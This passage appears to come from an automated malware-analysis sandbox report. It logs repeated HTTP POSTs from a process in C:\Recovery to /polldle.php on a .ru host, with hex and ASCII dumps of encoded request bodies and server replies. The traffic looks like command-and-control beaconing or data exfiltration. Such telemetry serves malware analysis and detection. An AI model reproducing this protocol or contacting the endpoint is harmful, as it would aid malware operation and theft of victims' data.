                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                46192.168.2.449964104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:32.620986938 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:32.973712921 CET1620OUTData Raw: 58 5e 51 52 5f 46 5a 51 54 5d 55 5a 50 5e 59 5c 50 52 5a 5f 57 5c 50 58 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X^QR_FZQT]UZP^Y\PRZ_W\PX[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU .C2$Y&2*',2#%^-++(?W231. 6"#+%#X'/\/,
                                                                                Jan 11, 2025 23:33:33.092134953 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:33.329216957 CET951INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:33 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KlgGNoPhR4bCV%2FjNBspxLuAI00XPYAWOt4yQUaZ5It9Z6kpqILAlugotrxZU3EjhtQAUHW2m93q2vmkFL3y0kp%2BzH6fdQLdWeDE2IaxzP8TVD5I0M59ILYbtCwchzt2YEhFBcgfP"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e7d89671839-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4492&min_rtt=1614&rtt_var=6361&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1939&delivery_rate=59255&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2d 0d 27 34 0a 5d 3d 39 2b 59 2e 28 3f 5b 2d 21 0e 5a 3e 22 32 5f 20 17 2b 02 25 0b 28 57 3e 2a 2d 40 3c 3a 24 0c 37 00 25 0c 26 13 23 46 0c 1d 22 10 3d 11 2f 0a 25 5a 27 03 29 30 32 13 31 1c 23 19 29 27 3f 13 2a 2a 32 01 22 3c 3d 0d 2b 22 3a 0f 2a 1b 0c 17 2c 1f 20 00 32 10 2e 51 0f 16 22 0d 21 08 2f 04 22 2e 3f 15 32 1e 3b 12 29 27 3c 10 32 04 0e 14 28 23 0c 5f 2b 0c 3f 08 33 2e 34 09 31 06 3e 5c 3c 3a 2c 0a 3c 01 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98-'4]=9+Y.(?[-!Z>"2_ +%(W>*-@<:$7%&#F"=/%Z')021#)'?**2"<=+":*, 2.Q"!/".?2;)'<2(#_+?3.41>\<:,<$\#(V?[M0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                47192.168.2.449965104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:32.750979900 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:33.098568916 CET2504OUTData Raw: 5d 5e 54 51 5a 48 5a 59 54 5d 55 5a 50 5f 59 5c 50 55 5a 58 57 52 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^TQZHZYT]UZP_Y\PUZXWRPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU .3@%(?&3Y&",68+Z??<206,7$]"/<#X'/\/(
                                                                                Jan 11, 2025 23:33:33.223433018 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:33.465531111 CET811INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:33 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A8zHVSqo8GnmzNSFGjlhUO3VFPNcqvCFm60eEVX24uai1qVC5%2FvuepEl0CLYN9Ka1deBpgPiuPaeFrTurOUN%2F5Ws4NR%2B3YAAHK41YiDMQYKXA836tQ%2Bj2xFDAOq0vBOC%2BDFfVL4%2F"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e7e5d50b9c5-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8080&min_rtt=2011&rtt_var=12893&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=28871&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                48192.168.2.449971104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:33.586257935 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:33.942331076 CET2504OUTData Raw: 58 5e 54 52 5a 48 5f 5a 54 5d 55 5a 50 5d 59 5f 50 53 5a 53 57 55 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X^TRZH_ZT]UZP]Y_PSZSWUPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#A.35%(8Y%=X3.#5/];X)/(%36.0"!?]+5#X'/\/
                                                                                Jan 11, 2025 23:33:34.158008099 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:34.270266056 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:34.288883924 CET806INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:34 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=smLAh0HOhWmASQX%2FXgXdXENIEnnJd0rlWqM%2Fh40R1k%2FDJYduymjSxaXowSEScpXZTLeAHrpAEbMqglvG6UUJVfJYDzTV%2FMivNhoGHbkN18WDZ9rfNRc03zy1iH5Y5I9FWHVdgqcQ"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e83885f6a52-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3502&min_rtt=1711&rtt_var=4223&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=91028&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                49192.168.2.449977104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:34.829845905 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:35.176700115 CET2504OUTData Raw: 5d 5a 54 56 5f 43 5f 5a 54 5d 55 5a 50 55 59 5c 50 52 5a 5e 57 52 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]ZTV_C_ZT]UZPUY\PRZ^WRPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#B:U&%]116$Y9S4Z>,8+Z(&T.[#2#Y<#X'/\/
                                                                                Jan 11, 2025 23:33:35.274679899 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:35.444473982 CET806INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:35 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b8qu%2Fo0BaNuS1Kd6BsIvAXN9bjUI6VaGY84Dv5MAHHx6YTp8px7ZnzW8NANiQUgyP4OwV5d%2BAgjJot4drCeLLJ96qqndkSuVwxnDobOC%2BpO%2BfLMNcnRNSEksCpKiOkZrp9QUMKYu"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e8b39fb1a24-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4822&min_rtt=1984&rtt_var=6421&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=59123&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                50192.168.2.449983104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:35.575347900 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:35.926717997 CET2504OUTData Raw: 58 51 51 50 5a 49 5a 5a 54 5d 55 5a 50 5b 59 50 50 53 5a 5b 57 53 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQQPZIZZT]UZP[YPPSZ[WSP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#F:%18$Z%T5$4!Z/+;[<?,1#,$;5+<#X'/\/
                                                                                Jan 11, 2025 23:33:36.039613008 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:36.275959969 CET815INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:36 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g2p4cnEkRIcn2GhfEjn3V%2FaNqc%2B%2Bpfg%2FgLhaJb0EpTLbmVbQ7qLjdNkYWygKUiEBphub60AjPRtu0%2FJhqAqP7VwNYO%2FCP6YHtEKXaVtQBe08TpNs1DtX%2FUAiXBFrVI%2Bbba4tJ4V8"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e8ffec8c436-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2963&min_rtt=1489&rtt_var=3507&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=109890&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                51192.168.2.449989104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:36.398030996 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:36.754849911 CET2504OUTData Raw: 58 58 54 53 5f 44 5f 58 54 5d 55 5a 50 5a 59 5d 50 52 5a 5f 57 52 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XXTS_D_XT]UZPZY]PRZ_WRPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#,3"1;<\21*06"/*/;(/1#:S-'+5[(#X'/\/<
                                                                                Jan 11, 2025 23:33:36.870580912 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:37.106985092 CET805INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:37 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0GQ3sHHE2BQCZTKkZ49AypXNcMIafMlPf%2Fjs9Io1W2RZdMFKKlmjLLgynstIzYjrE6pnhLiQbO%2FuB8WwJXFy4gusEB1%2B0NnTIK3RdV6ANt2qEx0Hx0n5jG11PcQ11QZLda4WaGFV"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e952a2a8c57-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3298&min_rtt=1958&rtt_var=3414&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=115151&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                52192.168.2.449995104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:37.371926069 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:37.723629951 CET2500OUTData Raw: 5d 59 54 54 5a 40 5f 5b 54 5d 55 5a 50 5c 59 5e 50 56 5a 52 57 53 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YTTZ@_[T]UZP\Y^PVZRWSP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#A.3.1;29Y$?%R _-(4+?3202.B _5+<#X'/\/<
                                                                                Jan 11, 2025 23:33:37.834806919 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:38.067089081 CET808INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:38 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UKpkRs6uoS0lYfJCRAPygQ%2FormAgfjNs0XQADr4IpufIGkbq7v12VYdvLKiaj9xmPixhc47Vgkkhv95cKvOqHa38NCC7%2BMwAmW1S%2FYs9pPD9vTwEi8XcBD%2FxTdfl39pj5dnwu%2F85"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e9b2fa8de94-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3292&min_rtt=1606&rtt_var=3974&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=96720&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                53192.168.2.450001104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:38.206327915 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                54192.168.2.450002104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:38.340356112 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1596
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:38.692361116 CET1596OUTData Raw: 58 50 54 54 5f 44 5f 58 54 5d 55 5a 50 5d 59 50 50 53 5a 5c 57 54 50 5b 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XPTT_D_XT]UZP]YPPSZ\WTP[[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#C951(/$"*%/- 2,;[), 1,$$[6,+#X'/\/
                                                                                Jan 11, 2025 23:33:38.800487041 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:38.957979918 CET963INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:38 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=beohgQAMfkYr9mbce1XeQKeSB6I7HFq%2BD%2BISqQj4%2BiMu%2Fbjb6X0aiXBMBKv7SkWh%2BvJlhqTwBv%2BgHyzx4zj8dOrSZuNpfngxqcWjDuD%2BH3jr%2Fgt5dd27W8Ivj4wqCbIIdS00r3J2"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ea139e332f4-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3886&min_rtt=1913&rtt_var=4665&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1915&delivery_rate=82467&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2e 53 27 1d 2f 02 3e 07 2f 5e 39 28 09 5b 2c 31 28 13 3e 08 26 5f 37 39 28 5c 25 22 24 53 28 5c 31 06 3c 5c 28 0e 20 00 0f 0c 25 03 23 46 0c 1d 21 00 3d 3f 24 53 27 2f 34 5d 29 23 0c 13 25 0c 28 43 3d 1a 37 1c 3d 2a 3a 07 36 02 04 18 2b 31 29 57 2a 1b 22 17 2c 31 3c 01 31 2a 2e 51 0f 16 21 57 23 21 38 14 23 2e 20 05 24 23 24 02 3f 27 2c 5c 31 2a 28 50 3f 23 21 01 3c 31 30 1d 30 5b 3f 56 27 2f 03 05 3e 39 05 51 3c 01 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98.S'/>/^9([,1(>&_79(\%"$S(\1<\( %#F!=?$S'/4])#%(C=7=*:6+1)W*",1<1*.Q!W#!8#. $#$?',\1*(P?#!<100[?V'/>9Q<$\#(V?[M0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                55192.168.2.450004104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:38.464637995 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:38.817344904 CET2500OUTData Raw: 5d 5b 54 50 5f 43 5f 5f 54 5d 55 5a 50 5c 59 5e 50 50 5a 5c 57 55 50 5e 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ][TP_C__T]UZP\Y^PPZ\WUP^[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#B-U6%;%T53Y1S7/=^8(+[(4&#!-8"2#\(%#X'/\/<
                                                                                Jan 11, 2025 23:33:38.936810017 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:39.242655993 CET812INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:39 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
